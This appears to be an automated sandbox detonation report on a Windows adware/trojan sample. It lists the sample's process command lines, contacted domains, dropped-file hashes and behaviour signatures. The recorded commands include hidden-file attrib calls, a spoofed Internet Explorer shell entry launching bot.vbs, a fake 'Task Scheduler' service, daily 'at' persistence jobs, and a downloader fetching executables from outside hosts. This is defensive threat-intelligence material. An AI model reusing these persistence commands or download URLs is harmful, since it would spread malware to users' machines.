Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
"C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\Kingsoft\myfile\file.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?ha
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?ha
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\tool.cmd
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s ".\Microsoft\bot.vbs"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1504 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s ".\tool.cmd"
C:\Windows\SysWOW64\attrib.exe
attrib +r +h +s ".\open.vbs"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\Kingsoft\myfile\Microsoft\bot.vbs" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\fav\fav.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\runonce.cmd
C:\Windows\SysWOW64\sc.exe
sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
C:\Windows\SysWOW64\sc.exe
sc config Schedule start= auto
C:\Windows\SysWOW64\net.exe
net start "Task Scheduler"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start "Task Scheduler"
C:\Windows\SysWOW64\at.exe
at 8:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\at.exe
at 11:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\at.exe
at 14:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\at.exe
at 17:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\at.exe
at 21:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\at.exe
at 23:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\360.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\cpa.cmd
C:\Program Files\Kingsoft\myfile\soft\msn.exe
"C:\Program Files\Kingsoft\myfile\soft\msn.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://soft.downxiazai.info/soft/YoudaoDict_zhusha_quantui_001.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe" "http://www.xunlei6x.com/msn/software/partner/1/chic7.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del .\runonce.cmd
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.dao666.com | udp |
| HK | 154.220.60.25:80 | www.dao666.com | tcp |
| HK | 154.220.60.25:80 | www.dao666.com | tcp |
| US | 8.8.8.8:53 | download.youbak.com | udp |
| HK | 8.210.83.183:80 | download.youbak.com | tcp |
| US | 8.8.8.8:53 | soft.downxiazai.info | udp |
| US | 13.248.169.48:80 | soft.downxiazai.info | tcp |
| US | 8.8.8.8:53 | www.xunlei6x.com | udp |
| US | 172.82.182.50:80 | www.xunlei6x.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Program Files\Kingsoft\myfile\file.vbs
| MD5 | 4a605601bb2c14b2856257b7b0c9f72b |
| SHA1 | e8a205693b77e7c4a35ce1539f2a3750a54a607a |
| SHA256 | 112e555e915ae44f2270a4c07417ce8e9a7b934bf780b4e534938fff6f47d17e |
| SHA512 | b1f6e26a7e41ff23e36b8297842daece7ce0f78abaf9bcf08679e516ff48af6132a9644a87b233d55881043201839c9e37cb8da02b3e7842ee506c0133dcf3cd |
C:\Program Files\Kingsoft\myfile\tool.cmd
| MD5 | 03471db7f2a2b9ed56d391fd1224474e |
| SHA1 | 4d3c3f719b56c4feb82a70bc97215d0a5534c817 |
| SHA256 | fe5e2851c481a0f479b2c6dc2bb6ebf267f10822f542b19d2dc71adbd67f5371 |
| SHA512 | 36c2e1ef0e0d062a22132e90083fe49fd8bad8f0f8443f651e70e3f87735f27edb1b3ed4a513e4c51ca1f9ae28205a12b0096aaa10220eb685bb2116819a0b0a |
C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs
| MD5 | 4741fe194f7332fcd29e7a83921c48d0 |
| SHA1 | 87648303da1f415c940753d03a61c0ad6066303d |
| SHA256 | 647afc0d0ea461025ed7c165ea012b2f9d703d23c21b45d9f67eb71375eb6e05 |
| SHA512 | 68653ce23e453995087f3d707df09ad147e2799181f9535d12e7c46b3bcd85baad281f235ab1f097d867b40f7babebf9bfc5659d9cb644ad050f80a266857f5e |
C:\Program Files\Kingsoft\myfile\open.vbs
| MD5 | 365359072c2d2b3593d9bb7d8ad2587e |
| SHA1 | ee6dc55034ad093e6ec5d81a3af97559cb68e2b6 |
| SHA256 | eb142788eed404ed50ea562da317e7abb9d0b25fcb5a8c51fec76643430e206d |
| SHA512 | f0f6ba5369cbf3aa5315256943e17135297ae937e8cb814a02bcc9d977d84608be843c28ed9067b9d9ed46d46bc07d03bf039495f5dcf2cb0012cd4f15e80544 |
C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk
| MD5 | b26bdf8dd432f327015e14428a20790a |
| SHA1 | a5db52d58ad5911ee4d54576335c250ccf86083e |
| SHA256 | ff0f9b5b7634cadb7a4d58ccb1fa58c015217b6b890995c9ddc83156c9f8f43a |
| SHA512 | a532c5b0a22e1cb09beab9d1acbe2a972a02d3a7c7782207410fe40f2a38316155dfc8de63be971ec1d69432ecd9033c971a588d65c40a5abb69d3f4792ba8d4 |
C:\Program Files\Kingsoft\myfile\fav\fav.cmd
| MD5 | 49cb8d1c4ec9b7b4cba2dda2226cf9f9 |
| SHA1 | 28878d2840cd6bb8f345aeb185bc9b5acd19f62c |
| SHA256 | 80f6196a21dbafc669a8468ef3d0a16ded883365264e545237eefddd617d83a3 |
| SHA512 | d440104c7fb55b6e31cc73ebbeef11fc0ff14380156c1227085325923933210f6f687ee3e0daa1b47e0aed6e0a03e0c7263cdebc3a2e58261bb1f62e46bf229e |
C:\Program Files\Kingsoft\myfile\fav\tao.ico
| MD5 | 8320a22354a5419af035cdf42902ae93 |
| SHA1 | d9954707de08eaa6ecc7d13d69f76c51b316ebcc |
| SHA256 | 419408ac3e52f9b5878825dd3fc416a394ff5665208bbd36930ea52910be04bc |
| SHA512 | 592c4404292705321da9ec099ff60a22d396395acf31f900d4da661949a40c7966fcb20e7f8cadcd41c1dc729a290d68b21a74a352cb5b1b0a1b7b0ca1d5715b |
C:\Program Files\Kingsoft\myfile\runonce.cmd
| MD5 | a5adb190983aeba13ddd600df0f54c7c |
| SHA1 | 0f5727a77f726df6e2f54881a4ec14ea349d3c28 |
| SHA256 | 9de9d82ee19a26103e3d18960eee9f8c75b580d5bcfe86182eda70b9fe928b64 |
| SHA512 | 3485c554ed2a7531beaf6cdc4525b9740e2f83e1929848a79f6a1a927453f4dce816443f94d8c32b5f461b4a3e2048cf2268be2076ee907c4f5d2bb0cf913294 |
\??\PIPE\atsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Program Files\Kingsoft\myfile\360.cmd
| MD5 | af37ab2d97a8822d603054ba02e453b6 |
| SHA1 | a9c3892ab02681d98f6f6be0666ce2d99a6cb80e |
| SHA256 | 001a8ba40066c0820d2911c68edbdda46657f1ded63558ba0939760c7b699416 |
| SHA512 | 42e6af1d518cc2cccbb180e59dd77cb2c30463724977edca19de7fa43ae97b988f400e153e151686ca0119d42412dc8d8012d165826e6cefa975c3cfef91e883 |
C:\Program Files\Kingsoft\myfile\se1.vbs
| MD5 | 694a79b632b956b7537bf78b4d6cd83a |
| SHA1 | ce04560daf58883ff32a01c355fc3db0c012449a |
| SHA256 | fee86f4d3a6cd91c94ee5c762b5a56b2fbb8fd880ad31f3ac08d63789d8b47bc |
| SHA512 | 353a79e00fe3a0fc4c664096b0fcf24230e9eefa3dbad21c53356f7b41d6c21d6f04293473025bc8c7bde130efc9e91ca002a12fa7debe41498a9fe99c8d9bce |
C:\Program Files\Kingsoft\myfile\se.vbs
| MD5 | 811afc25970fe2402bb05093eb0974db |
| SHA1 | 85c8c5deaf21946519edbf6a73d095097a81c177 |
| SHA256 | 5ec36f1336cb7ba697cd36aeb24b5d86c6e4609f566c0a14c54f5e79b35c6360 |
| SHA512 | 9a2d8cccd9dd43d4dd4bf886c3983fd40cfec5c3484ab221ffbab52884a560476199c61cdc6722ed346a005faf95b4de8dce2a391f7c4db7ef7dee305446017a |
C:\Program Files\Kingsoft\myfile\cpa.cmd
| MD5 | 3b24f51190ca32436b8c5b0ef8b2da27 |
| SHA1 | e8011f11bfebef1f25aa95b0fd5945f74e8ad258 |
| SHA256 | be1a009d09aabbb90b79d754542d6216ed59ff0e75e7f6fe12def54f1e0fb0d9 |
| SHA512 | ee67c06f58767aef4045c568514f018c39e5c82498345fb969c9a02ac9280077cd9fa8312156d6c386d2705e187e4347d6018bd078690b360843f43a4f44b4f8 |
C:\Program Files\Kingsoft\myfile\soft\msn.exe
| MD5 | 700742d098ceb5760ecc5428af1d3665 |
| SHA1 | 9adb397704593a127a02b121229a3e39bc4e3ca5 |
| SHA256 | b7a12d2c10911badd73ab91884356d14a48824f216d11e441423b765bf59694d |
| SHA512 | 44031b16fe3027058a9fb8c3be749de94e7513c7d1ce43ce9966d37ee756d2e1c2645ba318c14a2eef5da744c8952a3304d811d77774bd98b5ade9211516c99f |
\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe
| MD5 | 0c18455508ca5d9ced9b8c51046af383 |
| SHA1 | da113b832bd2acb6190947d4e11f5a97a0be80a8 |
| SHA256 | fb254313e1f3aba11d554fe4725e72ed9b797b954fd42f4fb1abc60cfd8e51cf |
| SHA512 | 6f2962d45055c8a934788f61afeda407e5262ac52c05316533206dbbfb279e00d78e72f3148383265e29bf1f94782d1994ddd40602cc536ca4feed12d3d157e4 |
C:\Users\Admin\AppData\Roaming\JjlDownLoader\0CloudEx_onlinesetup.exe
| MD5 | e89f75f918dbdcee28604d4e09dd71d7 |
| SHA1 | f9d9055e9878723a12063b47d4a1a5f58c3eb1e9 |
| SHA256 | 6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023 |
| SHA512 | 8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0 |
C:\Users\Admin\AppData\Local\Temp\Cab1410.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Roaming\JjlDownLoader\0CloudEx_onlinesetup.exe
| MD5 | 1bc415b31cdff50d79ea2a3d7b4ff2c1 |
| SHA1 | f5ebab61deebc3d7a4a6676a23b982f1418ae6a6 |
| SHA256 | 582ea6421c80adc1de2dcb34fb8db1926e34b49219d99306693166a6b268d412 |
| SHA512 | ee9718e829fa7c6b2e3b208fe99acd390d704a4ad037fd9b5ae231db184f48146792fb1ac028a69224ddca2c3195ef2aa5353ee6bc7abe01157773f4a6e50e84 |
memory/1724-140-0x0000000000400000-0x0000000000423000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar1848.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 20391452d1ba07399104390a9f424e5f |
| SHA1 | 2046ddf8f159ccd29ccd355f293fb706ef2e2280 |
| SHA256 | 202e887929bded12ebaa548bfc7b0e1073aaddee1f2842745da9a8fcf2ef6b5c |
| SHA512 | 8c2498553259dc89fa0573f327fc1c5dac7d47be63680a98075924c13f29f15a63b7621df928b78b66ab78e638c3c33be6835e113591d7b80b4960874945d89b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b6937e3bfcc45a94189c88d5c69e9c99 |
| SHA1 | 0c28953812824bc59e0fdc6cdb6c06f392409787 |
| SHA256 | 2a14648785521ebde8e5275969796dbe148847d92bd286c1d39cbedd0d55cde3 |
| SHA512 | 2c6302faefb80596214170bc50e8b2d15eaab53942ffda7ad48444242f1292ba5f3330d18f59689ec75a5bfbfa960b8058894ce004ffb2fbed33ca58794921cf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a23d171b5bdf66788af71f01e777df4b |
| SHA1 | 1882e7f75203bfc0f00747bff6ed467c7828ad75 |
| SHA256 | de8c565e99b4381f863b28c4a22e8f172c57285a836aae01fd47a390fe396962 |
| SHA512 | 133ffef9856cb3e173da036eef52440404840a6e897624fd7bde95e32629a1ce0776f483bff9afe11a48a5aea3842ae99ae9b50db1a5dbafb0d4662b29fe1256 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 67564cc598bb53bcc414992fae3c0b94 |
| SHA1 | c4f044a282a1693a738694b0a218f0e5a1ce391a |
| SHA256 | 0912ed3bacecf7179e93fd3689c18f19d546f19655a1a0c09246ff3ff342a097 |
| SHA512 | 3144bc4781fd680f84fa9add4076860165ae0b206a6fd858436c31d844faf0ec2133650707dfa7357fa49127c477b95504794b5d05dea6a3c16475d8b5311a74 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b385859e1b295bd936317eb03a1476b9 |
| SHA1 | 4b465decb87662d8285d049ee1c0fecaddae75a8 |
| SHA256 | 15cb171390fa3e1ed65b0ee1023f732a64c8767f93095aeefee21dda89a10fdf |
| SHA512 | a53486917633a63cb175f7e581f4a22151d0f1577dd198ae7bdaa570cf7893ff61f6157c0a7c5c3273fc28474119a660124719e6e62680ffad43b14364c59cb7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f7e1c2979dd4ceb75e82e05b72ed93b0 |
| SHA1 | 4d993af0854a1801eeb6c64ef11eaa9580103784 |
| SHA256 | 8ab55868a7fc62d9c192f60e836651dbaf90b3cdc61f2eb7697bc79900b9beca |
| SHA512 | 5a5d8548573e6cc20df0166cebaa05a99d222651b45aa93411e15436cbfa57af2b0469bb3e5921f4ff6aa5f4ecf4a26a3bc023552dd123d902629e99580afd16 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 57cca3db17be445f58b3d2852ae8c784 |
| SHA1 | 531e42282cef705f50902d7ff08d2a37693bba7b |
| SHA256 | 12a0fc9722105f902c299429c8a76022a0eb404727e50141b2e747a9e57dd27a |
| SHA512 | 22eb59dfdf6ab9d6f74a7840286b8de50b6b5a287eb878f61d49cb4d5ecd9ff90cda81fe25bd3982fecc3593afee373ba24420dad4c9de450c6c6b6c49bff231 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f76469903ddef8b9f017e4169e253d36 |
| SHA1 | fed425ebe46d10384852b3de6ac87ac593ba78e6 |
| SHA256 | dce1877d723d69118b6e5bbf023bdab4152e6c08b5f6cc0b0d75ff3f06e84511 |
| SHA512 | f26eadcd92f22db54b3d8cb66462bef4ec23d56839deadc289a319009750efbdf6873c47b858136e81247960f7117d92d1cc3bdc01924d6cf0c1f07a667d89db |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5dfccba58e8c4089512199d91dd05686 |
| SHA1 | 4bb49511e64397b240226e7a630e36dd555a5093 |
| SHA256 | 502437b707bdb560f96f8188c733d3153ef51ba8ec7d65b2a15c97cf721abd01 |
| SHA512 | b6a07a35c8bef7664c13309201ed6d906d2a858ee27e01d80f8b07fad3bf6e37570c75d104f9751060c8f20e78b2147c4451498ae735c4f9b212b49d448ce89a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5cd580aaf2584d8f9f7982fa999fca0d |
| SHA1 | 8f32c2575d7282265368036b9b23604270030cc3 |
| SHA256 | 16f3df7c424b6d2e8a96729640af39a8d2e87be91c3aff71bdedd137dd7b8d98 |
| SHA512 | 07d36d15656369ec51e1038371e89ab6e4d1cf968188fb194231a9d980cc240d470ce760901d31d261cda3e38f58ee3c30061c0b721c8f3c2d61f4ee7f88ae4b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a6e4147ca8e79c26342b328b3cc90af9 |
| SHA1 | 67eff7b756964b333bbeb808f2e6c583b3f85bea |
| SHA256 | 7483fd8602e657847fa9bb984921886907f17aceef9c3b2e4e8d529a003cf69e |
| SHA512 | cc09f216d41fa6fbc1b977ceb730c71cc858808332d0857834a920bf090f7868bfad89e66de69413ac91ea4bf12b363a79c1bcd8376d75671eb359a5afa1567b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-07 21:30
Reported
2024-11-07 21:32
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
113s
Command Line
Signatures
Creates new service(s)
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files\Kingsoft\myfile\soft\msn.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Kingsoft\myfile\soft\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
Indicator Removal: File Deletion
Drops file in Program Files directory
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
